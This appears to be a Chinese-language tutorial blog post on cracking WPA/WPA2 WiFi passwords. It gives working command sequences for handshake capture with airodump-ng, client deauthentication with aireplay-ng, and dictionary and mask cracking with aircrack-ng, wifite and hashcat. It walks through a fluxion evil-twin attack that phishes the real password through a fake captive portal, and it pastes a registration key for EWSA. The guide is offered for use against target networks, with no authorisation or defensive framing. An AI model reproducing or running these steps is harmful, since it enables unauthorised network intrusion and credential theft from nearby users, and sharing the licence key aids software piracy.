Safe: 破解
- TAGS: Safe
WIFI
airmon 抓包
准备工作
- vmware虚拟机
- 安装kali操作系统,官方下载
- 无线网卡一张,用来监听wifi
操作
1.vmware 菜单栏载入网卡。
虚拟机–> 可移动设备–>找到网卡点击连接
2.进入kali终端提升权限
进行kali系统,打开终端切到root用户。
sudo su #查看网卡 airmon-ng #扫描当前所有wifi airodump-ng wlan0 #抓取握手包 airodump-ng -w freedom -c 1 --bssid 9E:90:61:98:99:FA wlan0 ignore nefative-oneaa #-c wifi 对应的信道 #bassid 是对应的mac地址
3.开拓攻击
再开一个终端执行攻击命令
aireplay-ng -0 20 -a 9E:90:61:98:99:FA -c BC:17:B8:CA:EE:82 wlan0 #20 表示攻击次数 #-a 是路由走的mac #-c 表示客户机的mac
多试几次,直到看到握手包有 WPA handshae 出现,证明抓取到了。/home/kali/freedom-01.* 就是抓取到的握手包文件
这时抓取握手包可以停了。下面破解密码.
核心原理:在进行攻击时,让之前连接wifi的客户机强制下线,下线之后客户机重新连接我们才能抓取到握手包。如果没抓取到可能是攻击次数不够。
4.使用密码文件破解wifi
找到一个好的字典文件进行破解,可能网上下载。这里使用kali自带的字典。
aircrack-ng -w /usr/share/wordlists/wifite.txt freedom-.*ivs
出现KEY FOUND,就可以看到密码了。
fluxion
fluxion钓鱼攻击,不跑密码,简单省心
https://github.com/FluxionNetwork/fluxion.git
原理
- 通过路由器发送特定的包文件,使得所有连接这个wifi的客户端断开连接。当客户端重新连接路由器时,会发送包含握手包的数据到路由器,握手包中包含加密的wifi密码。此时这个加密的握手包也会被我们的攻击电脑获得
- 使用pollution创建一个虚假的不需密码登录的同名开放wifi,并且对路由器进行攻击,使得所有的客户端都连不上这个真正的wifi。此时手机就会自动连接这个虚假的wifi。
- 连上钓鱼wifi后,会要求对wifi进行验证,从而获得wifi密码。
准备
准备带监听功能无线网卡,或者在淘宝平台搜索kali linux 无线网卡
支持5G | 不支持5G |
---|---|
RTL8812AU | Ralink 3070(AWUS036H) |
RTL8811AU | Ralink 8187(AWUS036NH) |
Ralink RT3572 | AR9002U (TPLINK WN722N) |
MediaTek MT7612U | Realtek RTL8186L |
Realtek RTL8814AU | Atheros AR9170 |
操作
1.打开虚拟机,连接无线网卡。vmware
虚拟机–> 可移动设备–>找到网卡点击连接
2.打开命令行终端
sudo su #下载fluxtion git clone https://github.com/FluxionNetwork/fluxion.git cd fluxion ./fluxion.sh -i # -i 系统自动下载缺少的组件 #提示缺少 pyrit xterm #安装xterm sudo apt-get -y install xterm #安装pyrit sudo apt-get -y install libpcap-dev sudo apt-get -y install python2.7-dev libssl-dev zliblg-dev libpcap-devanagari git clone https://github.com/JPaulMora/Pyrit.git cd pyrit python setup.py clean && python setup.py build && python setup.py install
安装好之后,运行程序
cd fluxion ./fluxion.sh [2] Handshake Snooper 检索WPA/WPA2加密散列 #选择第2个,扫描所有wifi热点 [3] 扫描所有信道(2.4GHz & 5Ghz) #选择3,找到目标wifi后,按 Ctrl + c [012] TP-LINK_9AEE #输入目标wifi的序号 12 [2] 跳过 #选择第2个 [重置攻击] #选择第2个,重置攻击 [3] mdk4 解除认证方式(侵略性) #选择3 [2] cowpatty 验证(推荐) #选择 2 ,推荐 #下面都选择推荐的,现在已经开始抓取握手包了。手机查看wifi,如果发现闪烁就说明抓到包了 [1] 选择启动方式 #选择1 [1] 专属门户 创建一个“邪思的双胞脸”接入点 #选择1 [2] 跳过 #选择2 [2] 重置攻击 #选择2 [2] wlan0 [*] Ralink Technology, Corp. RT5370 #选择2,就是我们插入的无线网卡 [1] mdk4 #选择1 [1] 流氓 AP - hastapd(推荐) #选择1 [1] hash - cowpatty #选择1 [1] 使用抓取到的hash文件 #选择1 [2] cowpatty 验证(推荐用这个) #选择2 推荐的 [1] 创建SSL 证书 #选择1 [1] 断开黑网络(推荐) #选择1 [*] 选择钓鱼热点的认证页面 [03] 通用认证网页 Chinese #选择3 中文认证页面,开始创建钓鱼wifi. 可以发现出现了2个同名wifi #手机连不上真正的wifi,就会自动进行钓鱼wifi #手机用户在弹出的认证页面输入正确wifi密码。kali系统会保存密码,有提示位置 #打开文件就可以看到密码了 ... Password: 12345678ert ...
wifite
wifite最简单的破解wifi工具,点击几点直接抓包
kali自带工具,终端输入wifte就能运行
https://github.com/kimocoder/wifite2
支持的攻击模式
- WPA:WPA握手捕获+离线破解。 最常用的抓包模式。前提:当前路由至少有一个客户端连接
WPA:PMKID哈希捕获+离线破解。这个模式不需要有客户端连接,但路由器需要支持且开启了漫游功能,一般企业级路由器有才这个功能
安装组件:apt install hcxdumptool ; apt install hcxtools
- WPS:在线暴力破解PIN码攻击。PIN码通常只有8位数字,但很多路由器都有防PIN功能。
操作WPA抓包
1.打开虚拟机,连接无线网卡。vmware
虚拟机–> 可移动设备–>找到网卡点击连接
2.打开命令行终端
wifite --kill #确保只有一个服务在运行 #Ctrl+c停止扫描。在扫出wifi的结果中 CLIENT 中有数字代表有客户端连接 #如目标wifi [4] TP_LINK_CC7D #输入4 开始抓包 #可以在手机中观察wifi状态。 wifi正在疯狂重连 #出现 saveing copy of handshake to hs/handshake_TP_LINK_CC7D_xxx.cap saved时,说明已经抓到握手包,一般1-2分钟 #出现Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist 说明在使用默认字典文件破解。 #使用默认字典,如果解不出也很正常。解决方法:换一个更大的字典,或者把握手包拷贝到本地电脑用更高效的工具破解 ewsa/hashcat
指定字典破解
kali自带字典位置: /usr/share/wordlists 。小字典 wifite.txt 20w行, 大字典 解压 gip -d rockyou.txt.gz 1000W行密码
sudo wifite --wpa --dict /usr/share/wordlists/wifite.txt --kill
同时攻击多个wifi目标
sudo wifite --wpa --dict wifite.txt --kill #输入多个目标用逗号分开。如 1,2,35
hashcat, ewsa
hashcat, ewsa跑字典最快工具,最高一秒跑40w字典。使用GPU
跑包速度:
- EWSA7.1: 1.9w/s
- Hashcat: 4.5w/s
ewsa 安装和使用
需要输入注码:EWSA-173-HC1UW-L3EGT-FFJ3O-SOQB3
中文界面: 菜单栏 Options -> Language –> Chinese
操作:
- 点击导入数据,添加需要破解的握手包
- 菜单栏 选项–>破解选项,添加准备好的字典文件
- 点击开始破解
hashcat 安装和使用
在安装目录打开cmd。 目录上面输入cmd回车
hashcat -I #查看电脑的配置 cpu和GPU的信息
操作
.cap抓包文件转换为hc格式
在线转换地址: https://hashcat.net/cap2hashcat
字典暴力破解
#使用单个字典 hashcat -m 2200 xxx.hc2200 password.txt #按s查看实时跑包状态 #使用多个字典 hashcat -m 22000 xxx.hc22000 pass\*.txt
掩码暴力破解
例如密码是8位的纯数字可以用
?d?d?d?d?d?d?d
,代表所有组合,?d
表示0-9任意数字hashcat -a 3 -m 22000 xxx.hc22000 ?d?d?d?d?d?d?d?d
更多使用方法参考官网: https://hashcat.net/wiki/doku.php?id=hashcat
linux 安装
sudo apt install -y build-essential git
git clone https://github.com/hashcat/hashcat.git
make && make install
newgrp
水滴和奶瓶
经典抓包工具. 使用cdlinux镜像创建虚拟机
https://distrowatch.com/table.php?distribution=cdlinux
操作
1.打开虚拟机,连接无线网卡。vmware
虚拟机–> 可移动设备–>找到网卡点击连接
2.双击打开minidwep-gtk 水滴工具
- 点击“扫描”,扫描周围所有wifi
选择目标wifi,点击“启动”抓取握手包
弹出提示时,说明握手包已经抓取到了。选择no,把握手包保存下来。提示保存位置。ok
选择yes,把握手包拷贝到home目录下。
点击“跑字典”,选择home目录下的握手包。
指定字典文件。选择默认的wordlist.txt
可以使用U盘把握手包拷贝出来,用更高效工具破解。